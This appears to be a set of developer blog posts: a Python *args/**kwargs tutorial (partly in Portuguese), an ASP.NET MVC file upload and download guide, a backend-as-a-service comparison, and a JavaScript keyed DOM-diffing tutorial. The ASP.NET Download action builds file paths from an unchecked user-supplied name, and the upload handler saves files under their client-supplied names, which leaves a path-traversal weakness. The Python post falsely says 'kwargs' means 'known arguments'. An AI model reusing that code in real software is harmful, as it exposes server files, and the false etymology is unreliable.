I know, it sounds strange, so let's go with an example:
```python
lista = [1, 2, 3]
a, *nova_lista = lista
print(a, nova_lista)
```
output:
```
1 [2, 3]
```
<br>
Interesting, right? We assigned the first item of the list to the variable "a", and the rest automatically went into a new list called "nova_lista". There you go, that's unpacking. That is what the star character "*" is for.
Let's play a bit with functions, since that's where we really use this concept day to day.
Bring on the code then 😊
```python
def recebe_nomes(*args):
print(args)
recebe_nomes("akuma", "ryu", "ken")
```
output:
```
('akuma', 'ryu', 'ken')
```
<br>
Look at the magic happening. We just created a function that accepts several arguments dynamically. And our "args" argument became a tuple with every argument we passed, just like we saw earlier.
<br>
## Handling arguments/parameters in functions
Now let's take a short break and understand how functions handle arguments in Python. I promise this break matters 😜
Well, Python works with two kinds of arguments:
- positional arguments
- keyword arguments
### Understanding positional arguments
Positional arguments are what we just used. They are recognized first in functions. In other words, once you use a keyword argument, positional arguments can no longer follow it, but I'll explain that better in a moment.
Positional arguments are when we pass values directly to functions. Let's see:
```python
def recebe_tres_nomes(nome_1, nome_2, nome_3):
print(nome_1, nome_2, nome_3)
recebe_tres_nomes("akuma", "ryu", "ken")
```
output:
```
akuma ryu ken
```
<br>
See how interesting: I used the same example we've already seen, and also defined the function explicitly to receive 3 names. The overall idea is to show the arguments being passed one by one; note that we are passing the values directly when calling the function. So *args is that list of parameters passed positionally.
Notice that the "recebe_tres_nomes" function does not print a tuple but each item separately, because that is what we told it to print.
### Understanding keyword arguments
Here we go. Now let's use the same example, but passing keyword arguments. Notice I'll change the order of the names, and we'll still get the same result:
```python
def recebe_tres_nomes(nome_1, nome_2, nome_3):
print(nome_1, nome_2, nome_3)
recebe_tres_nomes(nome_2="ryu", nome_3="ken", nome_1="akuma")
```
output:
```
akuma ryu ken
```
<br>
Now I used the arguments in reversed order and got the same result. That's because Python reads each parameter's name and captures its value.
But there's a detail here. Remember I said we must respect the order in which functions recognize arguments? Well, I said we should always use the positional arguments first and the keyword ones afterwards.
So it is possible to call our function like this:
```python
def recebe_tres_nomes(nome_1, nome_2, nome_3):
print(nome_1, nome_2, nome_3)
recebe_tres_nomes("akuma", nome_2="ryu", nome_3="ken")
```
output:
```
akuma ryu ken
```
<br>
See, I passed the first one positionally and the rest through the argument names. Now, we cannot invert this. Look at me here 🥸 It does not work! See for yourself:
```python
def recebe_tres_nomes(nome_1, nome_2, nome_3):
print(nome_1, nome_2, nome_3)
recebe_tres_nomes(nome_2="ryu", nome_3="ken", "akuma")
```
output:
```
recebe_tres_nomes(nome_2="ryu", nome_3="ken", "akuma")
^
SyntaxError: positional argument follows keyword argument
```
<br>
Python will complain about the order of the argument kinds.
Don't try this at home... Kidding, try it and see for yourself.
## Back to unpacking
Well, as I said, that was a short break so we can understand keyword unpacking.
We know how a dictionary works in Python, right? (I hope so 🤣)
We have a key followed by a value.
So if we try to assign a dictionary to several variables, those variables will receive the keys. Look:
```python
nomes = {
'nome_1': 'akuma',
'nome_2': 'ryu',
'nome_3': 'ken'
}
a, b, c = nomes
print(a, b, c)
```
output:
```
nome_1 nome_2 nome_3
```
<br>
Now here's the trick: if we pass our dictionary of names with 2 stars, the function will receive the keys and values, and each key will act as a keyword argument for the function. Cool, right?
```python
def recebe_nomes(nome_1, nome_2, nome_3):
print(nome_1, nome_2, nome_3)
nomes = {
'nome_1': 'akuma',
'nome_2': 'ryu',
'nome_3': 'ken',
}
recebe_nomes(**nomes)
```
output:
```
akuma ryu ken
```
<br>
Keep in mind that if you pass an argument that does not exist among the defined parameters, an exception will be raised:
```python
def recebe_nomes(nome_1, nome_2, nome_3):
print(nome_1, nome_2, nome_3)
nomes = {
'nome_1': 'akuma',
'nome_2': 'ryu',
'nome_3': 'ken',
'nome_4': 'mega man',
}
recebe_nomes(**nomes)
```
output:
```
Traceback (most recent call last):
File "c:\DevNew\Myblog\MyBlog\posts\post_03\code.py", line 14, in <module>
recebe_nomes(**nomes)
TypeError: recebe_nomes() got an unexpected keyword argument 'nome_4'
```
<br>
Well, that's why we use **kwargs, because then we can receive as many arguments as needed:
```python
def recebe_nomes(**kwargs):
print(kwargs)
nomes = {
'nome_1': 'akuma',
'nome_2': 'ryu',
'nome_3': 'ken',
'nome_4': 'mega man'
}
recebe_nomes(**nomes)
```
output:
```
{'nome_1': 'akuma', 'nome_2': 'ryu', 'nome_3': 'ken', 'nome_4': 'mega man'}
```
<br>
And now the `kwargs` parameter has become a dictionary with all of our keyword arguments.
Now let's think about the order of the argument types: the positional arguments must come first, followed by the keyword ones. And since we have already played with both, how about mixing things up and making the function accept both?
```python
def recebe_nomes(*args, **kwargs):
print(args)
print(kwargs)
recebe_nomes("akuma", "ryu", "ken", jogo="street fighter")
```
output:
```
('akuma', 'ryu', 'ken')
{'jogo': 'street fighter'}
```
<br>
See? We passed several positional arguments, which ended up in the `args` tuple, and the keyword ones ended up in the `kwargs` dictionary.
We can also unpack from lists and dictionaries:
```python
def recebe_nomes(*args, **kwargs):
print(args)
print(kwargs)
nomes = {
'nome_1': 'akuma',
'nome_2': 'ryu',
'nome_3': 'ken',
'nome_4': 'mega man'
}
jogos = ["street fighter", "Mega Man x4"]
recebe_nomes(*jogos, **nomes)
```
output:
```
('street fighter', 'Mega Man x4')
{'nome_1': 'akuma', 'nome_2': 'ryu', 'nome_3': 'ken', 'nome_4': 'mega man'}
```
<br>
Bom isso foi o desempacotamento e as expressões *args e **kwargs que vemos por aí.
## Considerações
Quero te lembrar que esses nomes são uma convenção, funcionária com qualquer nome. Você não é obrigado a usar as palavras args e kwargs para funcionar. Se o planeta escreve assim, vamos escrever também, certo? Vamos manter o padrão.
Por curiosidade, o nome "args" vem de "arguments" (argumentos), e "kwargs" vem de "known arguments" (argumentos conhecidos)
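Just to prove the names are only a convention, here is a quick sketch with different parameter names; it behaves exactly the same:

```python
def recebe_tudo(*valores, **opcoes):
    # 'valores' collects the positional arguments as a tuple,
    # 'opcoes' collects the keyword arguments as a dict
    print(valores)
    print(opcoes)

recebe_tudo("akuma", "ryu", dificuldade="hard")
```

The stars do all the work; `args` and `kwargs` are just the names everyone agreed on.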
And that's it! Thanks for making it this far 😉
## Conclusion
Using the unpacking technique with functions is very common in day-to-day work. It is a topic that causes a bit of confusion at first glance, which is why I tried to explain it in as much detail as possible so that you can really understand how it works. I hope this helped someone.
| scjorge |
---
title: How to Upload and return files in ASP.NET MVC?
published: true
date: 2023-03-23T05:15:27
tags: beginners, mvc, dotnet, webdev
canonical_url: https://www.ifourtechnolab.com/blog/how-to-upload-and-return-files-in-asp-net-mvc
---
In this blog, we will shed light on how to upload and return a file in ASP.NET MVC.
When a user uploads files, they should be stored inside the project, so we need to create a folder for the uploaded files. Let's get started by creating an MVC application.
## Creating MVC Application
Create a new MVC application for file uploading and downloading.
### Adding Folder
Here, we created a folder in our project to store uploaded files.

[Fig :- Storing Uploaded File]
We need to create a model class for uploading and returning files. Right-click on the Models folder and add a class file. Here I will use the code-first approach to implement the upload and return functionality. Place the following code inside the class file.
**Filetables.cs**
```
using System.Collections.Generic;
using System.Web;

namespace Dynamicappendpartial.Models
{
    public class Filetables
    {
        public IEnumerable<HttpPostedFileBase> files { get; set; }
        public int Id { get; set; }
        public string File { get; set; }
        public string Type { get; set; }
    }
}
```
Right-click on Models and add Ado.Net Entity Data model.

[Fig :- Empty Code First model]
This empty code-first model creates a context file for your database connection. You can now register your Filetables class within the context file shown below.
```
using System;
using System.Data.Entity;
using System.Linq;

namespace Dynamicappendpartial.Models
{
    public class FileBlog : DbContext
    {
        public FileBlog() : base("name=FileBlog")
        {
        }

        public virtual DbSet<Filetables> Filetables { get; set; }
    }
}
```
Now, we need to run the required migration commands in the Package Manager Console.
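If you are using Entity Framework 6, the migration commands in the Package Manager Console typically look like this (the migration name here is just a placeholder):

```
Enable-Migrations
Add-Migration InitialCreate
Update-Database
```

This creates the Migrations folder, scaffolds the initial migration, and applies it to the database configured in the FileBlog context.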
### Read More: [Generate Thumbnail Using Asp.net MVC](https://www.ifourtechnolab.com/blog/generate-thumbnail-using-asp-net-mvc)
We need to add a controller. Right-click on the Controller folder and click on add > controller.

[Fig :- Creating Controller]
Select Empty controller from the list and give the controller a suitable name. Here I named the controller Filetables. Then place the following code inside the controller.

[Fig :- Add Controller]
**FiletableController**
```
using System;
using System.Collections.Generic;
using System.Data;
using System.Data.Entity;
using System.IO;
using System.Linq;
using System.Net;
using System.Web;
using System.Web.Mvc;
using Dynamicappendpartial.Models;
namespace Dynamicappendpartial.Controllers
{
public class FiletablesController : Controller
{
private FileBlog db = new FileBlog();
// GET: Filetables
public ActionResult Index()
{
List<Filetables> ObjFiles = new List<Filetables>();
foreach (string strfile in Directory.GetFiles(Server.MapPath("~/UploadFile")))
{
FileInfo fi = new FileInfo(strfile);
Filetables obj = new Filetables();
obj.File = fi.Name;
obj.Type = GetFileTypeByExtension(fi.Extension);
ObjFiles.Add(obj);
}
return View(ObjFiles);
}
public FileResult Download(string fileName)
{
string fullPath = Path.Combine(Server.MapPath("~/UploadFile"), fileName);
byte[] fileBytes = System.IO.File.ReadAllBytes(fullPath);
return File(fileBytes, "application/force-download", Path.GetFileName(fullPath));
}
private string GetFileTypeByExtension(string extension)
{
switch (extension.ToLower())
{
case ".docx":
case ".doc":
return "Microsoft Word Document";
case ".xlsx":
case ".xls":
return "Microsoft Excel Document";
case ".txt":
return "Text Document";
case ".jpg":
case ".png":
return "Image";
default:
return "Unknown";
}
}
[HttpPost]
public ActionResult Index(Filetables doc)
{
try
{
foreach (var file in doc.files)
{
if (file.ContentLength > 0)
{
var fileName = Path.GetFileName(file.FileName);
var filePath = Path.Combine(Server.MapPath("~/UploadFile"), fileName);
file.SaveAs(filePath);
}
}
TempData["Message"] = "files uploaded successfully";
return RedirectToAction("Index");
}
catch
{
TempData["Message"] = "File upload Failed!!";
return RedirectToAction("Index");
}
}
}
}
```
Here I create two Index methods: one to display the uploaded files and one to handle the upload itself. The first Index method retrieves the list of uploaded files and displays it on the index page. On the same index page, I create a form to upload files.
The last Index method in the controller uploads a file to the server. I store all files inside the UploadFile folder we created before starting the code, and I use TempData to display a message after the files are uploaded successfully. If an exception occurs during execution, or the file was not uploaded successfully, TempData shows the "File upload Failed" message in the view.
In the controller, I also create a method for the file extension. This method determines which type of file was uploaded. There is also a method for downloading an uploaded file.
Right-click on the index method and add a view for the index method.
**IndexView**
```
@model IEnumerable<Dynamicappendpartial.Models.Filetables>
@{
    ViewBag.Title = "Index";
}
<style type="text/css">
    .btn {
        width: 100px;
        background: #00BCD4;
        border: 1px solid;
        border-color: white;
        color: white;
    }
    .card {
        width: 100%;
    }
    .gridborder {
        margin: 20px;
        border-top: 2px solid #DED8D8;
    }
</style>
<div style="border: 1px solid #DED8D8; width: 900px; font-family: Arial;">
    @using (Html.BeginForm(null, null, FormMethod.Post, new { enctype = "multipart/form-data" }))
    {
        if (TempData["Message"] != null)
        {
            <p style="font-family: Arial; font-size: 16px; font-weight: 200; color: red">@TempData["Message"]</p>
        }
        <div class="card mb-3">
            <div class="card-body">
                <h2 style="color: #47bfed">FILE UPLOAD AND DOWNLOAD IN ASP NET</h2>
                <p class="card-text"><b style="color: #FF5722">File:</b></p>
                <p class="card-text"><input id="files" multiple="multiple" name="files" type="file"></p>
                <input class="btn btn-primary" name="submit" type="submit">
            </div>
        </div>
    }
    <table class="gridborder row-border hover order-column dataTable no-footer">
        <thead>
            <tr>
                <th>@Html.DisplayNameFor(model => model.File)</th>
                <th>@Html.DisplayNameFor(model => model.Type)</th>
                <th></th>
            </tr>
        </thead>
        <tbody>
        @foreach (var item in Model)
        {
            <tr>
                <td>@Html.DisplayFor(modelItem => item.File)</td>
                <td>@Html.DisplayFor(modelItem => item.Type)</td>
                <td>@Html.ActionLink("Download", "Download", new { fileName = item.File })</td>
            </tr>
        }
        </tbody>
    </table>
</div>
```
Here in the view I create the upload form and display the list of uploaded files on the same page; you can modify the code as per your requirements.
To upload a file, we need an input of type file so we can select one.
### Searching for Reliable [ASP.NET Development Company](https://www.ifourtechnolab.com/dot-net-development-company)?
Now run the application. On the index view, you can see the choose-file option.

[Fig :- Index view for File Uploading]
If the file was uploaded successfully, you will see the "files uploaded successfully" message in the view.

[Fig :- Uploaded file Display with the message]
If the file was not uploaded, or if we click the submit button without selecting a file, the "File upload Failed" message is displayed in the view.

[Fig :- Uploaded file with the failed message]

[Fig :- Uploaded file]
You can see all the uploaded files inside the folder we created.
Click on the Download link to download a file; the downloaded file appears in the browser.

[Fig :- Download File]
## Conclusion
In this blog, I tried to explain how to upload files, how to retrieve the list of uploaded files, and how to download an uploaded file, with success and error messages along the way.
| ifourtechnolab |
1,411,931 | Top Backend-as-a-Service Solutions (BaaS) in 2023 | What is BaaS? Backend-as-a-service (a.k.a BaaS) is a model that provides developers with... | 0 | 2023-03-23T06:23:16 | https://blog.samiyousef.ca/comparing-backend-as-a-service-solutions-a-complete-guide/?ref=dev.to | baas, firebase, awsamplify, supabase | ---
title: Top Backend-as-a-Service Solutions (BaaS) in 2023
published: true
date: 2023-02-06 01:18:55 UTC
tags: BaaS,Firebase,AWSAmplify,Supabase
canonical_url: https://blog.samiyousef.ca/comparing-backend-as-a-service-solutions-a-complete-guide/?ref=dev.to
---

## What is BaaS?
Backend-as-a-service (a.k.a BaaS) is a model that provides developers with things such as user authentication and edge functions without needing to host a backend. The backend for the application is hosted by a third-party company (or sometimes self-hosted) and is "rented" to the client, hence the name.
It has exploded in popularity recently because of its ease of use and cost-effectiveness for small applications. With that said, not all BaaS solutions are created equally. Let's compare some alternatives while keeping the following things in mind:
- Features
- Pricing
- Scalability
- Security
- Platform support and extensibility
## Comparison
### Firebase
**Features:** Firebase's products are split into "Build", "Release & Monitor", and "Engage". Their build products include Firestore, Realtime Database, Cloud Functions, Authentication, and much more. The newly added Firebase ML allows you to add artificial intelligence to your project with minimal oversight.
**Pricing:** Firebase offers a generous free tier giving you 1 GB of Realtime Database, 1 GB of Firestore, 10K phone verifications, 5 GB of Cloud Storage, 200K CPU-seconds for Cloud Functions, 10 GB of static hosting, and 1000 ML API calls. Pricing above the free tier is competitive, being only slightly cheaper than AWS Amplify. [See more here.](https://firebase.google.com/pricing?ref=sami-yousefs-blog)
**Scalability:** Given Firebase is operated by Google, you almost do not need to worry about scaling. However, one caveat is the Realtime Database, which is limited to 1000 writes per second. Additionally, as your application grows, its cost will grow faster. At a large scale, Firebase is less cost-effective than other solutions.
**Security:** Being a proprietary platform, it's hard to assess the security of Firebase's internals. However, Firebase's SDKs are open-source and have no known security issues as of this time. The majority of Firebase is ISO and SOC-compliant, but some Firebase products have not completed ISO 27017 and ISO 27018 certifications, which might be a deal-breaker for large organizations.
In 2018, Appthority Inc. found over 3000 insecure Firebase databases leaking millions of records, some including 2.7 million plain-text passwords. Most agree that the fault lies with the developers for misconfiguring the databases and neglecting to encrypt passwords, but some argue Firebase should have better documentation or encryption by default.
**Platform Support and Extensibility:** Firebase has client SDKs for iOS, Android, Flutter, Web, C++, and Unity. Firebase also offers admin SDKs to integrate with your backend for Node.js, Java, Python, Go, and C#. If none of these meet your needs, Firebase also has a well-documented REST API, making it compatible with almost any application.
Firebase features a wide variety of extensions making integrations easier. Firebase extensions are currently in beta, so they're not quite ready for production. However, this is an excellent feature as it lets you do things like resizing an image or running payments with Stripe with minimal coding.
**Best for:** Medium-sized applications or start-ups, or developers just starting with BaaS.
### AWS Amplify
**Features:** AWS Amplify offers a comprehensive set of tools for building cloud-powered mobile and web applications. Its offerings include APIs, backend services, authentication, and storage. Amplify also integrates with other AWS services such as AppSync, Lambda, and Amazon S3 for even more functionality.
**Pricing:** AWS Amplify operates on a pay-as-you-go pricing model, meaning there are no upfront costs or ongoing commitments. The pricing is competitive and only slightly more expensive than Firebase. Pricing may vary depending on the services utilized, but AWS provides example usage scenarios to assist in cost estimation. [See more here](https://aws.amazon.com/amplify/pricing/?ref=sami-yousefs-blog).
**Scalability:** Since Amplify is built on the highly scalable AWS infrastructure it's ideal for applications that need to handle large traffic and growth. You almost never have to worry about your application crashing or slowing down during peak usage times.
**Security:** Like Firebase, Amplify is proprietary, meaning it's hard to assess its security. However, Amplify is part of multiple AWS compliance programs. It is frequently audited by third parties such as SOC, PCI, ISO, HIPAA, MTCS, C5, K-ISMS, ENS High, OSPAR, HITRUST CSF, and FINMA. Amplify's compliance makes it ideal for large, international companies that are required by law to use solutions that meet certain standards.
**Platform Support and Extensibility:** Amplify has SDK support for Javascript, Swift, Android, Flutter, and React Native. Amplify also has well-documented REST and GraphQL APIs making it easy to integrate with almost any platform.
AWS Amplify also offers a lot of options for customizing your backend. You can override generated resources, access and import existing AWS resources, and run custom scripts during deployment with the help of command hooks. And if you have specific DevOps tools and guidelines, the export feature lets you easily integrate Amplify into your existing setup. However, this needs to be set up manually, and it's much harder than Firebase's extensions feature.
**Best for:** Large-scale, complex applications and/or enterprise-level businesses.
### Supabase
**Features:** Supabase is an open-source Firebase alternative. It offers a Postgres database, Authentication, instant APIs, Edge Functions, Realtime subscriptions, and Storage.
**Pricing:** Supabase offers free, monthly, and pay-as-you-go pricing models. The pricing is reasonable and cost-effective compared to both Firebase and AWS Amplify. For $25/month, you get an 8GB database, 100GB file storage, 2M Edge Function invocations, daily backups and more. And since Supabase is open-source, you can host it yourself, although this is at the cost of scalability.
**Scalability:** Supabase is centred around one Postgres database, which makes it very scalable vertically. However, it's difficult to scale Supabase horizontally without sharding or replication, which come with their own pitfalls. [According to Inian Parameshwaran](https://github.com/supabase/supabase/discussions/323?ref=sami-yousefs-blog#discussioncomment-1044570), an engineer at Supabase, "We don't have a good solution yet for scaling Postgres horizontally, even in the hosted version, but we are working on that."
**Security:** Supabase is open-source, which means its security is transparent and easy to assess. It's SOC2 Type 1 compliant and sensitive information is encrypted at the application level before being stored. Additionally, Supabase's security monitoring is automated by Vanta, and Trust Reports are published regularly.
**Platform Support and Extensibility:** Supabase officially supports only Javascript and Flutter, but the community has built SDKs for Python and C++, too. Supabase has instant APIs, meaning API endpoints are automatically generated based on your schema. This would allow you to use Supabase on unsupported platforms, but the API documentation is not as robust as Firebase or AWS Amplify.
Like Firebase's extensions, Supabase offers integrations with third parties. Unlike Firebase, integrations with Supabase are a bit harder to set up, but the process is well-documented. Additionally, the open-source nature of Supabase means that you can add custom features and extensions to your backend as you see fit.
**Best for:** Small to medium-sized applications, projects that need a cost-effective solution, and developers who are looking for an open-source platform.
### Appwrite
**Features:** Appwrite is an open-source, self-hosted backend-as-a-service platform that offers Databases, Authentication, Storage, and Functions. Appwrite Cloud, the hosted version is currently in development but will be coming soon.
**Pricing:** The cost of hosting Appwrite varies depending on the hosting solution you use. Pricing for Appwrite Cloud is not available as of this date.
**Scalability:** Appwrite is built with scalability in mind, but it must be scaled manually. It uses a few Docker containers to run, and each container has its own job. Since most of these containers are stateless, scaling Appwrite is as simple as replicating them and putting them behind a load balancer.
**Security:** Like Supabase, Appwrite is open-source meaning security is easy to assess and vulnerabilities are caught and fixed quickly. As of writing, there are no known vulnerabilities in Appwrite. Additionally, Appwrite implements most modern security features like rate limiting and encryption.
**Platform Support and Extensibility:** The Appwrite server runs on Docker, making it supported on almost every platform. Appwrite also has client SDKs for the Web, Android, iOS, and Flutter, and admin SDKs for Node.js, Deno, PHP, Python, Ruby, Dart, Kotlin, and Swift. If none of these options fit your needs, Appwrite also features REST, GraphQL, and Realtime APIs allowing you to integrate on almost any platform.
Appwrite does not feature pre-built extensions or integrations. However, you can add custom features or make your own integrations because Appwrite is open-source.
**Best for:** Small- to medium-sized applications, and developers who want to host their own platform.
### Parse Platform
**Features:** Similar to Appwrite, Parse Platform is an open-source, self-hosted BaaS. Parse offers a comprehensive set of features like Authentication, Role-based access control, File Storage, Notifications, Cloud Functions, Analytics, and much more.
**Pricing:** Parse Platform is entirely self-hosted, pricing will vary depending on your hosting solution.
**Scalability:** Like Appwrite, the Parse server is stateless, meaning scaling it is as easy as replicating it and putting it behind a load balancer. Parse supports MongoDB and Postgres, which need to be scaled separately. According to [back4app](https://blog.back4app.com/how-to-scale-parse-server/?ref=sami-yousefs-blog), Parse can be scaled to handle well over 1000 requests per second.
**Security:** Parse uses Snyk to find vulnerabilities in its code base. As of writing, Parse has one high-severity denial of service vulnerability and 6 various medium-severity vulnerabilities. Besides these vulnerabilities, Parse is relatively secure because of its open-source nature.
**Platform Support and Extensibility:** Parse has excellent platform support with SDKs for Objective-C, Android, Javascript, Swift, Flutter, Dart, PHP, .NET, Unity, and even Arduino and Embedded C. And if these SDKs somehow don't fit your needs, Parse has REST and GraphQL APIs to easily integrate with any platform.
Parse does not have official extensions or integrations, but there are lots of community-built extensions, adapters and boilerplate starter code. Additionally, like any other open-source platform, you can add or modify Parse in any way you'd like to fit your needs.
**Best for:** Developers who want a comprehensive set of features while still hosting their own solution.
### PocketBase
**Features:** PocketBase is an open-source BaaS that features Authentication, File storage, and a real-time database. The kicker is the entire database is a single SQLite file, hence the name.
**Pricing:** PocketBase is entirely self-hosted and the price will depend on your hosting solution.
**Scalability:** Because PocketBase utilizes a single file as its database, it cannot scale horizontally. Additionally, scaling it vertically will be limited by the read and write speeds of your disk.
**Security:** PocketBase has excellent security because of its open-source nature and any vulnerabilities are quickly discovered and fixed. As of writing, PocketBase has no known security vulnerabilities.
**Platform Support and Extensibility:** PocketBase can be used as a standalone app or as a Go framework. When used as a standalone app, it only has official SDKs for Javascript and Dart. PocketBase does have a Web API so it can integrate with any platform.
**Best for:** Small-scale applications and prototyping.
## More Useful Information
### Choosing the Right BaaS Solution for Your Project
When it comes to selecting the perfect BaaS solution for your project, it's vital to consider the success and growth potential of your application. If you're looking for an open-source solution, Appwrite, Supabase, and Parse Platform are all great options to consider. On the other hand, if compliance with specific regulations is a must, AWS Amplify may be the ideal solution for you. And if you're new to BaaS and value strong community support, then Firebase is the way to go. To make an informed decision, take the time to carefully evaluate each solution, comparing features, pricing, and security measures to determine which one best fits your project's unique needs.
### Best Practices for Implementing a BaaS Solution
When using a BaaS, it's important to follow best practices to ensure a seamless and successful implementation. To ensure sensitive data is protected, you should use a strong encryption algorithm such as AES and always use HTTPS when making requests to the backend. Additionally, you should use environment variables and repository secrets to store API keys and never hard-code them. Finally, make sure to thoroughly check API response codes and handle them appropriately to avoid any unexpected errors in production.
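As a minimal Node.js sketch of those practices (the variable name `BAAS_API_KEY` and the status handling are illustrative, not tied to any particular provider):

```javascript
// Read the API key from the environment instead of hard-coding it.
function getApiKey() {
  const key = process.env.BAAS_API_KEY; // hypothetical variable name
  if (!key) throw new Error("BAAS_API_KEY is not set");
  return key;
}

// Map response status codes to explicit outcomes instead of
// assuming every request succeeded.
function handleResponse(response) {
  if (response.status >= 200 && response.status < 300) {
    return { ok: true, data: response.body };
  }
  if (response.status === 401 || response.status === 403) {
    return { ok: false, error: "auth" };
  }
  if (response.status === 429) {
    return { ok: false, error: "rate-limited" };
  }
  return { ok: false, error: "unexpected" };
}
```

In a real app you would pass `getApiKey()` as a header on your HTTPS requests and route every response through a handler like this before touching the data.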
## Conclusion and Final Thoughts
Backend-as-a-service (BaaS) is a cost-effective solution for developers who want to host their application's backend without having to worry about the nuances of implementing their own. The choice of BaaS solution will depend on the size, complexity, and specific requirements of your application. Each BaaS has its own strengths and limitations and the best solution will ultimately depend on your specific use case. | sami_yousef |
---
title: Adding keys to our DOM diffing algorithm
published: true
date: 2023-03-23T07:02:08
tags: javascript, webdev, tutorial, react
canonical_url: https://dev.to/joydeep-bhowmik/adding-keys-our-dom-diffing-algorithm-4d7g
---
In my [previous post](https://dev.to/joydeep23/virtual-dom-diffing-algorithm-implementation-in-vanilla-javascript-2324) about the DOM diffing algorithm we learned to create our own virtual DOM and got to know how DOM diffing actually works. In this post we will learn how keys work and how we can add this feature to our virtual DOM. Before we start the actual coding, we must know why keys are necessary and the concept behind them.
## Importance of using keys
Keys tell our diffing algorithm which items need to be changed, added, or removed.
Without keys, our algorithm will push an update to a node even when we could achieve the same result by simply moving the node. Let me explain this with an example.
```
|-------DOM-------------|---------VDOM--------|
|-----------------------|---------------------|
| <Li val="A"> | <Li val="A"> |
| <Li val="B"> | <Li val="B"> |
| | <Li val="C"> |
|-----------------------|---------------------|
```
When we compare this DOM with the VDOM, our algorithm just appends the last child to the DOM. That's not a problem at all. The problem occurs when we face a situation like this.
```
|-------DOM-------------|---------VDOM--------|
|-----------------------|---------------------|
| <Li val="A"> | <Li val="c"> |
| <Li val="B"> | <Li val="A"> |
| | <Li val="B"> |
|-----------------------|---------------------|
```
In this case our algorithm will update the existing nodes in place and append a new one at the end. But we could have avoided all of this by simply prepending the new node to the DOM, which would make the update much faster. That's where keys come in.
```
|---------DOM-----------|-------VDOM----------|--------------------------|
| <Li key=1 val="A"> | <Li key=3 val="C"> | Moved from bottom to top |
| <Li key=2 val="B"> | <Li key=2 val="A"> | None |
| | <Li key=1 val="B"> | None |
|-----------------------|---------------------|--------------------------|
```
With the help of keys, we can now tell our algorithm that there is no need to change everything; just add the new node to the top.
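The decision that keys enable can be sketched without the DOM at all. This is a simplified, hypothetical reconciliation over plain `{ key, val }` objects, just to show reuse-by-key versus recreate-by-position:

```javascript
// Keyed reconciliation sketch over plain arrays (not the real DOM code).
// Each item is { key, val }; we reuse nodes by key instead of by position.
function reconcile(oldList, newList) {
  const byKey = new Map(oldList.map(node => [node.key, node]));
  return newList.map(vnode => {
    const existing = byKey.get(vnode.key);
    if (existing) {
      // same key: reuse (move) the node, patching only its value
      existing.val = vnode.val;
      return existing; // moved/kept, not re-created
    }
    // unknown key: a genuinely new node
    return { key: vnode.key, val: vnode.val };
  });
}

const dom = [{ key: 1, val: "A" }, { key: 2, val: "B" }];
const vdom = [{ key: 3, val: "C" }, { key: 1, val: "A" }, { key: 2, val: "B" }];
const result = reconcile(dom, vdom);
// result[1] is the SAME object as dom[0]: it was moved, not recreated
console.log(result[1] === dom[0]); // true
```

A real DOM version has to move actual nodes and keep sibling order, which is exactly what the `patchKeys` function below does.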
## Implementation
The implementation starts by simply adding the key attribute to our nodes. However, the key attribute never gets passed to the DOM; it stays as a property of the node object.
Let's modify our previous code to add key props, starting with the clean function.
```javascript
function clean(node) {
for (let n = 0; n < node.childNodes.length; n++) {
let child = node.childNodes[n];
if (child.nodeType === 8 ||(child.nodeType === 3 && !/\S/.test(child.nodeValue) && child.nodeValue.includes('\n')))
{
node.removeChild(child);
n--;
} else if (child.nodeType === 1) {
if(child.hasAttribute('key')){
let key=child.getAttribute('key');
//adding the key property to the node object
child.key=key;
//removing the keys
child.removeAttribute('key');
}
clean(child);
}
}
}
```
As our clean function iterates through all children, we check if the node has the key attribute. If it does, we read the attribute's value, set a key property on the node with that value, and then remove the key attribute.
Now all of our nodes have the key property. Let's create our patchKeys function.
```javascript
function patchKeys(vdom,dom){
//remove unmatched keys from dom
for(let i=0;i<dom.children.length;i++){
let dnode=dom.children[i];
let key=dnode.key;
if(key){
if(!hasTheKey(vdom,key)){
dnode.remove();
}
}
}
//adding keys to dom
for(let i=0;i<vdom.children.length;i++){
let vnode=vdom.children[i];
let key=vnode.key;
if(key){
if(!hasTheKey(dom,key)){
//if key is not present in dom then add it
//get the index of current node
let nthIndex=[].indexOf.call(vnode.parentNode.children, vnode);
if(dom.children[nthIndex]){
//adding before the same indexed node of dom
dom.children[nthIndex].before(vnode.cloneNode(true))
}else{
dom.append(vnode.cloneNode(true))
}
}
}
}
}
```
In the patchKeys function we iterate through the DOM and VDOM children. For each DOM child, if its key is not present in the VDOM, we remove that node from the DOM; for each VDOM child, if its key is not present in the DOM, we add it. While adding a node to the DOM we need to maintain the ordering: we get the index of the VNODE and insert the node before the same-indexed child of the DOM. If that child is not present in the DOM, we just append the VNODE.
The hasTheKey function helps us check whether a given key is present in the respective parent node.
```javascript
function hasTheKey(dom,key){
let keymatched=false;
for(let i=0;i<dom.children.length;i++){
//if the key is present then break the loop
if(key==dom.children[i].key) {
//update the keymacthed status
keymatched=true;
break};
}
return keymatched;
}
```
In the hasTheKey function we iterate through a parent node's children to check if the desired key is present; the function returns true or false accordingly.
Now all we need to do is add this to our diff function.
```javascript
function diff(vdom, dom) {
//if dom has no childs then append the childs from vdom
if (dom.hasChildNodes() == false && vdom.hasChildNodes() == true) {
//codes
} else {
patchKeys(vdom,dom);
//codes
}
}
```
Now here is our whole code after adding the key feature:
```javascript
function getnodeType(node) {
if(node.nodeType==1) return node.tagName.toLowerCase();
else return node.nodeType;
};
function clean(node) {
for (let n = 0; n < node.childNodes.length; n++) {
let child = node.childNodes[n];
if (child.nodeType === 8 ||(child.nodeType === 3 && !/\S/.test(child.nodeValue) && child.nodeValue.includes('\n')))
{
node.removeChild(child);
n--;
} else if (child.nodeType === 1) {
if(child.hasAttribute('key')){
let key=child.getAttribute('key');
child.key=key;
child.removeAttribute('key');
}
clean(child);
}
}
}
function parseHTML(str) {
let parser = new DOMParser();
let doc = parser.parseFromString(str, 'text/html');
clean(doc.body);
return doc.body;
}
function attrbutesIndex(el) {
var attributes = {};
if (el.attributes == undefined) return attributes;
for (var i = 0, atts = el.attributes, n = atts.length; i < n; i++) {
attributes[atts[i].name] = atts[i].value;
}
return attributes;
}
function patchAttributes(vdom, dom) {
let vdomAttributes = attrbutesIndex(vdom);
let domAttributes = attrbutesIndex(dom);
if (vdomAttributes == domAttributes) return;
Object.keys(vdomAttributes).forEach((key, i) => {
//if the attribute is not present in dom then add it
if (!dom.getAttribute(key)) {
dom.setAttribute(key, vdomAttributes[key]);
} //if the atrtribute is present than compare it
else if (dom.getAttribute(key)) {
if (vdomAttributes[key] != domAttributes[key]) {
dom.setAttribute(key, vdomAttributes[key]);
}
}
});
Object.keys(domAttributes).forEach((key, i) => {
//if the attribute is not present in vdom than remove it
if (!vdom.getAttribute(key)) {
dom.removeAttribute(key);
}
